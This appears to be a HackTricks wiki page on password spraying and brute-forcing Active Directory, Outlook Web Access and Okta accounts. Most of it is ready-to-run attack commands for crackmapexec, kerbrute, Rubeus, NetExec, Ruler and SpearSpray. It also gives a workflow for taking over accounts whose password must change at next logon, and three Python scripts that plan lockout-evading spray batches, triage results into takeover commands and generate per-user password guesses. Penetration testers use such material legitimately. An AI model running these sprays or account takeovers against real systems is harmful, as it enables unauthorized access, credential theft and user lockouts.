Password Spraying / Brute Force
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Password Spraying
Once you have found several valid usernames you can try the most common passwords (keep the environment's password policy in mind) against each of the discovered users.
By default the minimum password length is 7.
Lists of common usernames can also be useful: https://github.com/insidetrust/statistically-likely-usernames
Keep in mind that you could lock out some accounts if you try several wrong passwords (a lockout threshold of around 10 attempts is typical, so read the lockout threshold and observation window before you spray).
Get password policy
If you have user credentials or a shell as a domain user you can get the password policy with:

```bash
# From Linux
crackmapexec smb <IP> -u 'user' -p 'password' --pass-pol
enum4linux -u 'username' -p 'password' -P <IP>
rpcclient -U "" -N 10.10.10.10
rpcclient $> querydominfo
ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
```

```powershell
# From Windows
net accounts
(Get-DomainPolicy)."SystemAccess" # From PowerView
```
Exploitation from Linux (or anywhere)
- Using crackmapexec:

```bash
# Every user in users.txt is tried against every password in passwords.txt
# (add --continue-on-success to keep going after the first valid pair)
crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth authenticates against each host's local SAM instead of the domain,
## so it is a single attempt per machine and does not touch the domain lockout counter
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H <NT_hash> | grep +
```

- Using kerbrute (Go):

```bash
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
```

- spray (you can specify the number of attempts to avoid locking accounts out):

```bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
```

- Using kerbrute (python) - NOT RECOMMENDED, SOMETIMES DOESN'T WORK:

```bash
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
```

- Using the scanner/smb/smb_login module within Metasploit.
- Using rpcclient:

```bash
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
```
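The lockout values returned by `net accounts` / `--pass-pol` above are exactly what the `<AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>` arguments of spray.sh encode. The following is an added example, not code from the original page or from spray.sh/NetExec: it parses a constructed `net accounts` output, drops passwords the policy could not accept anyway, splits the rest into batches that keep a reserve of attempts below the lockout threshold, and renders each batch as NetExec command lines (the DC hostname and users.txt file name are assumptions).

```python
"""Lockout-aware spray planning. Added example, not from the original page
or from spray.sh/NetExec; the sample policy text below is constructed."""
import re
import shlex
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample in the layout `net accounts` prints on a domain member.
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.
"""


@dataclass
class LockoutPolicy:
    min_length: int
    threshold: Optional[int]   # None means lockout is disabled ("Never")
    observation_window: int    # minutes until badPwdCount resets


def parse_net_accounts(text: str) -> LockoutPolicy:
    """Pull the three values that matter for spraying out of `net accounts` output."""
    values = {}
    for line in text.splitlines():
        m = re.match(r"^(.*?):\s+(.*?)\s*$", line)
        if m:
            values[m.group(1).strip()] = m.group(2)
    threshold_raw = values.get("Lockout threshold", "Never")
    threshold = None if threshold_raw == "Never" else int(threshold_raw)
    return LockoutPolicy(
        min_length=int(values["Minimum password length"]),
        threshold=threshold,
        observation_window=int(values.get("Lockout observation window (minutes)", "0")),
    )


@dataclass
class SprayPlan:
    batches: List[List[str]]
    wait_minutes: int
    skipped: List[str] = field(default_factory=list)


def plan_spray(passwords: List[str], policy: LockoutPolicy, reserve: int = 2) -> SprayPlan:
    """Split candidates into batches of (threshold - reserve) attempts per user.

    One batch per observation window, so badPwdCount has reset before the next
    batch. Passwords shorter than the policy minimum are dropped: nobody can
    have them as a current password, they would only burn attempts.
    """
    usable, skipped = [], []
    for pw in passwords:
        (usable if len(pw) >= policy.min_length else skipped).append(pw)
    if policy.threshold is None:
        return SprayPlan(batches=[usable] if usable else [], wait_minutes=0, skipped=skipped)
    per_batch = policy.threshold - reserve
    if per_batch <= 0:
        raise ValueError("reserve leaves no safe attempts under this lockout threshold")
    batches = [usable[i:i + per_batch] for i in range(0, len(usable), per_batch)]
    return SprayPlan(batches=batches, wait_minutes=policy.observation_window, skipped=skipped)


def batch_commands(plan: SprayPlan, dc: str, userfile: str = "users.txt") -> List[str]:
    """Render each batch as NetExec commands, sleeping one observation window between batches."""
    cmds: List[str] = []
    for i, batch in enumerate(plan.batches):
        for pw in batch:
            # shlex.quote keeps passwords with shell metacharacters from breaking the command
            cmds.append(f"netexec smb {dc} -u {userfile} -p {shlex.quote(pw)} --continue-on-success")
        if i < len(plan.batches) - 1 and plan.wait_minutes:
            cmds.append(f"sleep {plan.wait_minutes * 60}")
    return cmds


if __name__ == "__main__":
    pol = parse_net_accounts(SAMPLE_NET_ACCOUNTS)
    plan = plan_spray(["Summer2024", "Welcome1", "Pass1", "Winter2024!", "Company123", "Spring2024"], pol)
    print("\n".join(batch_commands(plan, "dc01.corp.local")))
```

The reserve of two attempts mirrors what lockout-aware tools do by default; with a threshold of 5 that yields three passwords per window, and a `Never` threshold collapses the plan to a single batch.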
From Windows
- With a Rubeus version that includes the brute module:

```powershell
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```

- With Invoke-DomainPasswordSpray (by default it can generate the user list from the domain, read the domain password policy and limit attempts according to it):

```powershell
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```

- With Invoke-SprayEmptyPassword
Identify and take over "Password must change at next logon" accounts (SAMR)
A low-noise technique is to password-spray a harmless/empty password and detect accounts that return STATUS_PASSWORD_MUST_CHANGE, which indicates the password was force-expired and can be changed without knowing the old one.
Workflow:
- Enumerate users (RID brute via SAMR) to build the target list:

```bash
# NetExec (null/guest) + RID brute to harvest users
netexec smb <dc_fqdn> -u '' -p '' --rid-brute | awk -F'\\\\| ' '/SidTypeUser/ {print $3}' > users.txt
```

- Spray the empty password and continue on hits to catch accounts that must change their password at next logon:

```bash
# Will show valid, lockout, and STATUS_PASSWORD_MUST_CHANGE among results
netexec smb <DC.FQDN> -u users.txt -p '' --continue-on-success
```

- For each hit, change the password over SAMR with the NetExec module (the old password is not needed when "must change" is set):

```bash
# Strong complexity to satisfy policy (a plain assignment; `env NEWPASS=...` on its own line would not export it)
NEWPASS='P@ssw0rd!2025#'
netexec smb <DC.FQDN> -u <User> -p '' -M change-password -o NEWPASS="$NEWPASS"
# Validate and retrieve domain password policy with the new creds
netexec smb <DC.FQDN> -u <User> -p "$NEWPASS" --pass-pol
```

Operational notes:
- Make sure your host's clock is synchronized with the DC before Kerberos-based operations:

```bash
sudo ntpdate <dc_fqdn>
```

- A [+] without (Pwn3d!) in some modules (e.g. RDP/WinRM) means the creds are valid but the account lacks interactive logon rights.
- Changing the password is disruptive and visible: the legitimate user can no longer log in and the change is audited on the DC, so agree on it with the client before taking over an account.
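Sorting the spray output into "valid", "valid but not admin", "must change", "locked out" and "failed" is what decides the next step, and a single STATUS_ACCOUNT_LOCKED_OUT means the lockout policy was misjudged and the spray should stop. The following is an added example, not NetExec's own code: it triages result lines laid out like NetExec's SMB output (the lines are constructed, as are the domain, users and DC name) and renders the `change-password` commands for the must-change accounts.

```python
"""Triage of a NetExec empty-password spray. Added example, not NetExec code;
the output lines below are constructed in NetExec's line layout."""
import re
import shlex
from typing import Dict, List

# Constructed sample: what `netexec smb DC01 -u users.txt -p '' --continue-on-success` could print.
SAMPLE_OUTPUT = """\
SMB         10.10.10.10     445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.10     445    DC01             [-] corp.local\\alice: STATUS_LOGON_FAILURE
SMB         10.10.10.10     445    DC01             [-] corp.local\\bob: STATUS_PASSWORD_MUST_CHANGE
SMB         10.10.10.10     445    DC01             [-] corp.local\\carol: STATUS_ACCOUNT_LOCKED_OUT
SMB         10.10.10.10     445    DC01             [+] corp.local\\dave: (Pwn3d!)
SMB         10.10.10.10     445    DC01             [+] corp.local\\erin:
SMB         10.10.10.10     445    DC01             [-] corp.local\\frank: STATUS_ACCOUNT_DISABLED
"""

# [+]/[-] marker, DOMAIN\user, then the (empty) password and the NT status, if any.
RESULT_RE = re.compile(r"\[([+-])\]\s+(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<rest>.*)$")


def triage(output: str) -> Dict[str, List[str]]:
    """Bucket every result line by what it means for the operator."""
    buckets: Dict[str, List[str]] = {
        "admin": [], "valid": [], "must_change": [], "locked": [], "failed": []
    }
    for line in output.splitlines():
        m = RESULT_RE.search(line)
        if not m:
            continue  # banners and other non-result lines
        user, rest = m.group("user"), m.group("rest").strip()
        if m.group(1) == "+":
            # [+] without (Pwn3d!) is a valid credential without admin rights
            buckets["admin" if "(Pwn3d!)" in rest else "valid"].append(user)
        elif "STATUS_PASSWORD_MUST_CHANGE" in rest:
            buckets["must_change"].append(user)
        elif "STATUS_ACCOUNT_LOCKED_OUT" in rest:
            buckets["locked"].append(user)
        else:
            buckets["failed"].append(user)
    return buckets


def should_abort(buckets: Dict[str, List[str]]) -> bool:
    """Any lockout during the spray means the policy was misjudged: stop before more accounts lock."""
    return bool(buckets["locked"])


def takeover_commands(buckets: Dict[str, List[str]], dc: str, new_password: str) -> List[str]:
    """NetExec change-password invocations for accounts that must change at next logon."""
    return [
        f"netexec smb {dc} -u {shlex.quote(user)} -p '' -M change-password "
        f"-o {shlex.quote('NEWPASS=' + new_password)}"
        for user in buckets["must_change"]
    ]


if __name__ == "__main__":
    result = triage(SAMPLE_OUTPUT)
    for bucket, users in result.items():
        print(f"{bucket:12s} {users}")
    if should_abort(result):
        print("lockout observed: stop spraying and re-read the policy")
    print("\n".join(takeover_commands(result, "dc01.corp.local", "P@ssw0rd!2025#")))
```

The parser keys on the `[+]`/`[-]` marker and the `DOMAIN\user:` prefix rather than on column positions, so it survives the variable-width host and port columns in the output.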
Brute Force

```bash
legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org
```
Kerberos pre-auth spraying with LDAP targeting and PSO-aware throttling (SpearSpray)
Kerberos pre-auth based spraying is quieter than SMB/NTLM/LDAP bind attempts and fits AD lockout policies better. SpearSpray combines LDAP-driven targeting, a pattern engine and policy awareness (domain policy + PSOs + a badPwdCount buffer) to spray precisely and safely. It can also mark compromised principals in Neo4j for BloodHound pathing.
Key ideas:
- LDAP user discovery with paging and LDAPS support, optionally using custom LDAP filters.
- Domain lockout policy + PSO-aware filtering that leaves a configurable attempt buffer (threshold) to avoid locking users out.
- Kerberos pre-auth validation using fast gssapi bindings (generates 4768/4771 on DCs instead of 4625).
- Pattern-based, per-user password generation using variables like names and temporal values derived from each user's pwdLastSet.
- Throughput control with threads, jitter, and a maximum number of requests per second.
- Optional Neo4j integration to mark owned users for BloodHound.
Basic usage and discovery:

```bash
# List available pattern variables
spearspray -l
# Basic run (LDAP bind over TCP/389)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# LDAPS (TCP/636)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl
```

Targeting and pattern control:

```bash
# Custom LDAP filter (e.g., target specific OU/attributes)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
-q "(&(objectCategory=person)(objectClass=user)(department=IT))"
# Use separators/suffixes and an org token consumed by patterns via {separator}/{suffix}/{extra}
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep @-_ -suf !? -x ACME
```

Stealth and safety controls:

```bash
# Control concurrency, add jitter, and cap request rate
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5 -j 3,5 --max-rps 10
# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2
```

Neo4j/BloodHound enrichment:

```bash
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687
```

Pattern system overview (patterns.txt):

```
# Example templates consuming per-user attributes and temporal context
{name}{separator}{year}{suffix}
{month_en}{separator}{short_year}{suffix}
{season_en}{separator}{year}{suffix}
{samaccountname}
{extra}{separator}{year}{suffix}
```

Available variables include:
- {name}, {samaccountname}
- Temporal values from each user's pwdLastSet (or whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Composition helpers and the org token: {separator}, {suffix}, {extra}
Operational notes:
- Query the PDC emulator with -dc to read the most reliable badPwdCount and policy-related information (every DC forwards its bad-password notifications there).
- badPwdCount is reset at the next attempt after the observation window has elapsed; use the threshold and timing to stay safe.
- Kerberos pre-auth attempts show up as 4768/4771 in DC telemetry (4771 for a failed pre-auth, 4768 for a successful TGT request); use jitter and rate limiting to blend in.
Tip: SpearSpray's default LDAP page size is 200; adjust it with -lps as needed.
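The pattern engine and the attempt buffer described above are the two pieces that make per-user spraying both more likely to hit and less likely to lock anyone out. The following is an added example, not SpearSpray's own code: it derives the temporal variables from a user's pwdLastSet (falling back to whenCreated when pwdLastSet is 0), expands templates that use the page's variable names over the separator/suffix sets, and caps the per-user candidate list at lockout threshold minus reserve. The FILETIME handling is standard Windows epoch arithmetic; the season mapping, the user attributes and the cap function are assumptions for the example.

```python
"""Per-user, pattern-driven candidate generation in the style of SpearSpray's
pattern engine. Added example, not SpearSpray's code: the variable names follow
the page, the season mapping and sample users are assumptions."""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from itertools import product
from typing import Dict, List, Optional

_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
_MONTHS_EN = ["January", "February", "March", "April", "May", "June",
              "July", "August", "September", "October", "November", "December"]
# Northern-hemisphere seasons (assumption; SpearSpray's own mapping is not shown on the page).
_SEASONS_EN = {12: "Winter", 1: "Winter", 2: "Winter", 3: "Spring", 4: "Spring", 5: "Spring",
               6: "Summer", 7: "Summer", 8: "Summer", 9: "Autumn", 10: "Autumn", 11: "Autumn"}


def filetime_to_datetime(filetime: int) -> datetime:
    """pwdLastSet/whenCreated come from LDAP as FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return _EPOCH_1601 + timedelta(microseconds=filetime // 10)


def datetime_to_filetime(dt: datetime) -> int:
    # timedelta // timedelta is exact integer arithmetic, no float rounding
    return ((dt - _EPOCH_1601) // timedelta(microseconds=1)) * 10


def filetime_from_ymd(year: int, month: int, day: int) -> int:
    """Helper for building test attribute values without LDAP."""
    return datetime_to_filetime(datetime(year, month, day, tzinfo=timezone.utc))


def temporal_vars(filetime: int) -> Dict[str, str]:
    """The {year}/{short_year}/{month_*}/{season_en} variables for one user."""
    dt = filetime_to_datetime(filetime)
    return {
        "year": f"{dt.year}",
        "short_year": f"{dt.year % 100:02d}",
        "month_number": f"{dt.month:02d}",
        "month_en": _MONTHS_EN[dt.month - 1],
        "season_en": _SEASONS_EN[dt.month],
    }


@dataclass
class LdapUser:
    name: str             # value feeding {name}
    samaccountname: str
    pwd_last_set: int     # FILETIME; 0 means never set / must change
    when_created: int = 0  # FILETIME fallback when pwd_last_set is 0


def safe_attempts(lockout_threshold: Optional[int], reserve: int = 2) -> Optional[int]:
    """Attempts per user that keep `reserve` in hand; None when lockout is disabled (threshold 0)."""
    if not lockout_threshold:
        return None
    return max(lockout_threshold - reserve, 0)


def generate_candidates(user: LdapUser, templates: List[str], separators=("",), suffixes=("",),
                        extra: str = "", max_attempts: Optional[int] = None) -> List[str]:
    """Expand each template for one user, in template order, deduplicated and capped."""
    source = user.pwd_last_set if user.pwd_last_set else user.when_created
    variables = {"name": user.name, "samaccountname": user.samaccountname, "extra": extra}
    variables.update(temporal_vars(source))
    out: List[str] = []
    seen = set()
    for tpl in templates:
        # only iterate the sets a template actually consumes, otherwise we would emit duplicates
        seps = separators if "{separator}" in tpl else ("",)
        sufs = suffixes if "{suffix}" in tpl else ("",)
        for sep, suf in product(seps, sufs):
            cand = tpl.format_map({**variables, "separator": sep, "suffix": suf})
            if cand and cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out if max_attempts is None else out[:max_attempts]


if __name__ == "__main__":
    alice = LdapUser("Alice", "asmith", filetime_from_ymd(2024, 7, 15))
    templates = ["{name}{separator}{year}{suffix}", "{season_en}{separator}{year}{suffix}", "{samaccountname}"]
    print(generate_candidates(alice, templates, ("", "@"), ("", "!"), max_attempts=safe_attempts(5)))
```

Template order matters because the cap truncates from the end: put the patterns most likely to hit (name and season plus year) first, and keep generic ones such as `{samaccountname}` last.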
Outlook Web Access
There are several tools for password spraying against Outlook.
- With the MSF module auxiliary/scanner/http/owa_login
- With the MSF module auxiliary/scanner/http/owa_ews_login
- With Ruler (reliable!)
- With DomainPasswordSpray (PowerShell)
- With MailSniper (PowerShell)
To use any of these tools you need a user list and a password, or a small list of passwords, to spray.

```bash
# --delay 0 means no pause between attempts; raise it when a lockout policy is in place
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
```

```
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020
```
Okta
- https://github.com/ustayready/CredKing/blob/master/credking.py
- https://github.com/Rhynorater/Okta-Password-Sprayer
- https://github.com/knavesec/CredMaster
References
- https://github.com/sikumy/spearspray
- https://github.com/TarlogicSecurity/kerbrute
- https://github.com/Greenwolf/Spray
- https://github.com/Hackndo/sprayhound
- https://github.com/login-securite/conpass
- https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying
- https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell
- https://www.blackhillsinfosec.com/?p=5296
- https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying
- HTB Sendai – 0xdf: from spray to gMSA to DA/SYSTEM